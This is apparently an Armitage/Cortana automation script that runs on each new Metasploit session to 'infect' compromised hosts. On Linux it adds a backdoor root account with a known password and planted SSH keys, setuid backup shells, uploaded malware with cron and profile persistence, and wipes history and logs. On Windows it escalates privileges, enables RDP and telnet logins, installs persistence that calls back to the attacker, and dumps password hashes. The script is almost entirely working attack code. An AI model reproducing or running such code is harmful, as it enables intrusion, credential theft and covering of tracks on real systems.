# Script
#
global('%infected');
$local_ip = lhost();

on session_open {
	println("runningthis");
	$rhost = session_host($1);
	if(%infected[session_host($1)] != "1") {
		if(-isshell $1) {
			say("Infecting " . session_host($1));
			s_cmd($1, "mkdir /root/.ssh");
			$handle = openf("/root/.ssh/id_rsa.pub");
			$pub_key = readln($handle);
			s_cmd($1, "echo $pub_key >> /root/.ssh/authorized_keys");
			closef($handle);
			$handle = openf("/root/red/postex/unix/persist/users.txt");
			#Will probably change this
			while $text (readln($handle)) {
				s_cmd($1, "$text");
				#add some to sudoers
			}
			closef($handle);
			s_cmd($1, "echo 'administrator:\$6\$W6D9sKYe\$tPihBsmoYXNNBfDhmkT30tYqMdCtMN.zn9HpczbzVd0YMw9P5dAQnjQ4KqUN/4IG5xs4t1SUZP5k82vi5UWGc0:15578:0:99999:7:::' >> /etc/shadow"); # pass = abc123
			s_cmd($1, "echo 'administrator:x:0:0:nobody,,,,:/:/bin/bash' >>/etc/passwd");
			$ssh = "creds --add " . session_host($1) . " -p 22 -u administrator -P abc123";
			cmd_async($ssh);

			s_cmd($1, "cat /etc/passwd | sort > /tmp/pass");
			s_cmd($1, "cat /tmp/pass > /etc/passwd && rm /tmp/pass");


			#Create backup shells
			s_cmd($1, "cp /bin/zsh /.kernel; chmod +sss /.kernel; touch -d '4 May 2004' /.kernel; chattr +i /.kernel");
			s_cmd($1, "cp /bin/tcsh /tmp/X11.auth; chmod +sss /tmp/X11.auth; touch -d '4 May 2004' /tmp/X11.auth");

			#testing
			shell_upload($1, "/root/red/files/seapplet", "/usr/sbin/seapplet");
			s_cmd($1, "chmod 755 /usr/sbin/seapplet && chattr +i /usr/sbin/seapplet");
			s_cmd($1, "/usr/sbin/seapplet &");
			#edit these
			s_cmd($1, "/etc/cron.5min");
			shell_upload($1, "/root/red/mal/unix/netsh", "/var/spool/cron/netsh");
			shell_upload($1, "/root/red/postex/unix/annoy/lol.sh", "/sbin/lol");
			shell_upload($1, "chmod +x /sbin/lol");
			shell_upload($1, "/root/red/mal/unix/www", "/bin/watchdog");
			shell_upload($1, "/root/red/postex/unix/annoy/shelldestroyer.sh", "/sys/module/ipv6/kill");
			s_cmd($1, "cp /var/spool/cron/netsh /etc/cron.5min && cp /var/spool/cron/netsh /usr/bin/netsh && cp /var/spool/cron/netsh /etc/cron.hourly/netsh && cp /var/spool/cron/netsh /var/spool/cron/monthly/netsh && cp /var/spool/cron/netsh /usr/sbin/netsh");
			s_cmd($1, "mkdir /var/spool/cron/crontabs");
			s_cmd($1, "echo '*/5 * * * * /etc/cron.hourly/netsh' >> /var/spool/cron/crontabs/root");
			s_cmd($1, "chmod 600 /etc/cron.5min /var/spool/cron/crontabs/root");
			s_cmd($1, "service cron start");
			#this cmd
			s_cmd($1, "chattr -i /etc/profile /etc/skel/.profile");
			s_cmd($1, "chmod 755 /usr/bin/netsh /usr/sbin/netsh /var/spool/cron/netsh /etc/cron.5min /etc/cron.hourly/netsh");
			s_cmd($1, "echo '/usr/bin/netsh &' >>/etc/profile");
			s_cmd($1, "echo 'usr/bin/netsh &' >>/etc/skel/.profile");
			s_cmd($1, "echo 'while [ 1 ]; do /sbin/lol &; sleep 10; done' >>/etc/skel/.bash_profile");
			s_cmd($1, "chattr +i /usr/bin/netsh /usr/sbin/netsh /etc/profile /etc/skell/.profile");
			s_cmd($1, "echo '/var/spool/cron/netsh &' >>~/.bash_profile");
			s_cmd($1, "chmod +x /bin/watchdog");
			s_cmd($1, "watchdog");
			
			#end test			

			#cover those tracks
			s_cmd($1, "chmod 600 .bash_history");
			s_cmd($1, "echo '' > .bash_history");
			s_cmd($1, "chattr +i .bash_history");
			s_cmd($1, "rm -f /var/log/secure");
			s_cmd($1, "history -c");

			%infected[session_host($1)] = "1";

	
		}
		else if(-iswinmeterpreter $1){
			m_cmd($1, "getsystem");
			m_cmd($1, "run metsvc");
			m_cmd($1, "upload /root/red/postex/windows/persist/kill.bat c:\\Windows\\System32\\");
			m_cmd($1, "execute -f kill.bat");
			#run the last thing.
			m_cmd($1, "run getgui -u moto -p moto");
			m_cmd($1, "run getgui -e");
			m_cmd($1, "run gettelnet -u samuel -p samuel");
			m_cmd($1, "run gettelnet -e");
			m_cmd($1, "run persistence -X -i 60 -p 10000 -r $localip");
			m_cmd($1, "execute powershell Enable-PSRemoting -Force");

			handler("windows/meterpreter/reverse_tcp", "10000", %(LHOST => lhost()));
			handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));

			m_cmd($1, "run hashdump");

			%infected[session_host($1)] = "1";
		}
	}
}
